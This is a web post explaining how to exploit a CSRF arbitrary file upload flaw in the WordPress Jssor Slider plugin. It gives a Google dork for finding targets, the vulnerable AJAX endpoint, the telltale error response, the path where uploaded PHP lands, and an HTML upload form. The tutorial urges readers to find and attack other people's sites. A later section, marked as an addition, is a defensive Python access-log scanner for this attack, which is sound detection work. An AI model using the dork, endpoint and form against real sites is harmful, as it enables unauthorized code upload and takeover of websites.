WordPress Jssor-Slider CSRF Arbitrary File Upload



Jssor Slider is a slideshow / slider / gallery / carousel / banner plugin, optimized for mobile devices and offering many unique features.


  • Google Dork : inurl:''/wp-content/jssor-slider/jssor-uploads/''
  • Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
  • Vulnerability Error : Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
  • File Path : /wp-content/jssor-slider/jssor-uploads/yourfile.php

Tutorial :

First, copy the dork above and paste it into your browser, then look for a site you think is vulnerable. A site is vulnerable if entering the exploit path returns the vulnerability error shown above: Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}




Then open the CSRF form:
<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
If the response is blank or shows Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}, the site is vulnerable.
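
The detection side of the steps above, as an added example that is not part of the original post: a Python scan of web-server access logs for the request pattern and upload path given on this page. The log lines are constructed, and the site host name blog.example and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; not taken from any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library HTTP/1.1" 200 49 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=upload_library&param=upload_slide HTTP/1.1" 200 49 "http://other.example/form.html" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /wp-content/jssor-slider/jssor-uploads/x.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "https://blog.example/wp-admin/" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/jssor-slider/jssor-uploads/banner.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status, Referer
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
UPLOAD_DIR = "/wp-content/jssor-slider/jssor-uploads/"  # path as given on this page
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def classify(line, site_host="blog.example"):
    """Return a finding label for one log line, or None if it is unremarkable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _ip, method, target, _status, referer = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query)  # order of the two parameters does not matter
    if (url.path.endswith("/wp-admin/admin-ajax.php")
            and query.get("param") == ["upload_slide"]
            and query.get("action") == ["upload_library"]):
        if method != "POST":
            return "probe"  # the check that returns the JSON error
        # A form hosted elsewhere (or opened from disk) has a foreign or empty Referer.
        same_site = urlsplit(referer).hostname == site_host
        return "upload" if same_site else "upload-offsite"
    if UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path):
        return "script-in-upload-dir"  # executable file requested from the upload folder
    return None

def scan(log_text, site_host="blog.example"):
    """Return (label, client_ip) for every suspicious line, in log order."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line, site_host)
        if label:
            findings.append((label, line.split()[0]))
    return findings

if __name__ == "__main__":
    for label, ip in scan(SAMPLE_LOG):
        print(f"{label:22} {ip}")
```

A probe, an off-site upload and a script request from the same client within a short window is the sequence to alert on; any script file already present in the upload folder should be treated as a sign of compromise.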









